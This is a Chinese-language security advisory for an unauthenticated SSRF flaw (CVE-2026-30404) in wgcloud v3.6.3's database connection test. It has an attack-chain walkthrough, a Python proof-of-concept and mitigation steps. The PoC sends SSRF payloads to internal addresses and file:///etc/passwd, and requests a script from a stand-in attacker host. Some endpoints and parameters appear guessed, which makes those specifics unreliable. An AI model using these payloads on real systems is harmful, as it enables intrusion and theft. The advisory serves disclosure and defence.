CVE-2026-30404 wgcloud v3.6.3 数据库连接测试功能SSRF漏洞

漏洞信息

漏洞编号

CVE-2026-30404

漏洞类型

SSRF（服务器端请求伪造）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

wgcloud

漏洞概述

CVE-2026-30404是wgcloud监控系统v3.6.3版本中存在的一个高危安全漏洞。该漏洞位于后端数据库管理功能的连接测试模块，由于应用程序在处理用户提供的URL或主机地址时未进行充分的输入验证，攻击者可以利用此漏洞发起服务器端请求伪造（SSRF）攻击。攻击者通过构造恶意的请求参数，可以使服务器向内部网络资源、可信域或恶意服务器发起HTTP/HTTPS请求，从而实现内网端口扫描、服务探测、敏感数据读取、远程恶意文件下载等危险操作。此漏洞无需任何认证即可利用，且CVSS评分达到7.5分，属于高危漏洞。由于该系统通常部署在企业网络核心位置，漏洞被利用可能导致严重的内网横向渗透风险和企业敏感信息泄露。

技术细节

wgcloud v3.6.3的数据库管理模块提供了数据库连接测试功能，允许管理员测试数据库连接配置。该功能在实现时直接使用用户输入的URL或IP地址来建立连接请求，而没有对输入进行严格的白名单校验或安全过滤。攻击者可以通过构造类似file://、http://localhost、http://127.0.0.1或http://内部IP段的URL来绕过限制。技术层面上，当用户提交数据库连接测试请求时，系统会调用HTTP客户端库（如Apache HttpClient或OkHttp）执行请求，而该请求的目标URL完全可控。攻击者利用此漏洞可以：1）探测内网服务的开放状态和版本信息；2）读取本地文件系统中的敏感配置或凭证；3）通过gopher://或dict://等协议与内网非HTTP服务交互；4）利用服务器作为代理向外部目标发起攻击以隐藏真实来源。此漏洞的利用成功取决于目标环境的网络拓扑和系统配置。

攻击链分析

STEP 1

步骤1

攻击者发现wgcloud系统的数据库连接测试功能接口，通常位于/db/test或类似路径

STEP 2

步骤2

攻击者构造包含内网IP、localhost或file://协议的恶意URL作为host参数

STEP 3

步骤3

发送POST请求到数据库连接测试接口，服务器端会使用攻击者控制的URL发起请求

STEP 4

步骤4

通过响应时间或返回内容判断内网服务状态，实现内网端口扫描和服务探测

STEP 5

步骤5

利用gopher://或dict://协议访问内网非HTTP服务（如Redis、Memcached）获取敏感数据

STEP 6

步骤6

通过http://协议从攻击者控制的服务器下载恶意脚本或后门程序

STEP 7

步骤7

利用SSRF作为跳板进行内网横向移动，进一步获取数据库凭证等敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2026-30404 SSRF PoC for wgcloud v3.6.3
# Database connection test feature SSRF vulnerability

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target:8080'

# SSRF payloads to test internal network
payloads = [
    # Probe localhost
    'http://127.0.0.1:22',
    # Probe internal service
    'http://192.168.1.1:80',
    # Read local file
    'file:///etc/passwd',
    # Internal API access
    'http://localhost:8080/internal/api/config'
]

endpoint = f'{target}/db/test/connection'

for payload in payloads:
    data = {
        'host': payload,
        'port': '3306',
        'type': 'mysql'
    }
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        print(f'Payload: {payload}')
        print(f'Status: {response.status_code}')
        print(f'Response: {response.text[:200]}')
        print('---')
    except Exception as e:
        print(f'Error testing {payload}: {e}')

# Malicious file download via SSRF
print('\nTesting malicious file download...')
malicious_url = 'http://attacker.com/malicious.sh'
data = {
    'url': malicious_url,
    'action': 'download'
}
requests.post(f'{target}/db/fetch', data=data)

影响范围

wgcloud v3.6.3

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解风险：1）关闭或禁用数据库连接测试功能；2）配置网络访问控制列表，限制管理后台仅允许可信IP访问；3）监控Web应用日志，密切关注异常的数据库连接测试请求；4）使用WAF（Web应用防火墙）对/db/、/test/等路径进行安全防护；5）实施网络分段，限制服务器对内网其他系统的访问权限。建议尽快关注官方安全公告，及时应用官方发布的安全更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-30404
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-30404
3 Details https://www.cvedetails.com/cve/CVE-2026-30404/
4 VulDB https://vuldb.com/cve/CVE-2026-30404
5 Link https://github.com/TTTlw1024/qwe/issues/3
6 Link https://github.com/tianshiyeben/wgcloud/issues/98